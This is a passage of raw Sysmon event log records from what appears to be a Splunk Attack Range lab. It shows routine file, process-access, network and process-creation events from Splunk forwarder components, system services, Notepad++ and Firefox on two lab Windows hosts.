Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE41FC3094B9E1819113FD626E996BC5,SHA256=7DE2420F9D68D089AF4E2EA087363A7C7B7F7F5A55B5FD57951D0588CAC2F79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:19.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471179DC80BFC6722885B9F5B6330F96,SHA256=6173FD683872EAA22249FA94724E777F3856B86027C3F0785D502D09C47D0023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7224F2408E317E34C3870899DFFF530,SHA256=C156FE6CB00E9461E026CE5A894D6632B3FB91C73ED18C1455A2575D6765F45A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.378{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6BA164BBA629EC773649940FA83568,SHA256=216AEEC8812CF497DC0FAB8BA301A7E2FF498001354C730A5C23EB50D83572B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.224{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.208{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:21.872{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74F66E35D1D3F9430272D4DE2835C5CF,SHA256=35702D8A790D216ED5DC7B92753D45517A03DF0CFA6C887BD4B07913DDF9ADA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:20.511{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57200-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000806622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:21.269{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A3B0B890B4BA499F9B63AE4543ED7F,SHA256=849B80F3D20A59654A2644B4B94FDFD3D37EF0764CA5F1BA09921D9061379F3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:22.890{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72FD164EB079DB3ACB0B1EB1DA014F89,SHA256=F4B77B527F311B4C091544873BCF3BB31B60080E33AA322774DCA1E1E9FFDDA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:22.506{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=BC5F78334C37347EC1CDF9BB5076AFA8,SHA256=E45C487185123555C47A476BC76CD90222DF7188429F9226623F61D66511D84C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:22.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA41B46129EA67A93F33776676966E8,SHA256=93771E4EAF9A8FC6B68C057A5EA07AF26511C47AE10146AD2C367834E02B7945,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:23.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA1FB1F07729273C97FB53453FF95C62,SHA256=7E21BF69CCD0856572B6C1B926054A469433A7BE6013E000F7DBCAD8F2B37281,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:21.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57201-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:23.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF17258E527E8F918C58DDE6D0C12E7,SHA256=B6BEAEF197CFD5D4D2B2AB839B298043259E99BB95D2179D6C29451A9CC1BC7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:24.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15E16B312E83868849C7B56502EB477,SHA256=E2A8A256028C56AECB831D8B18174430B755CCD6ECDA5E31421A8C320BB152AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.925{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.910{0C1E0330-F38C-60EB-5179-00000000D001}3620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.394{0C1E0330-F38C-60EB-5079-00000000D001}4163280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 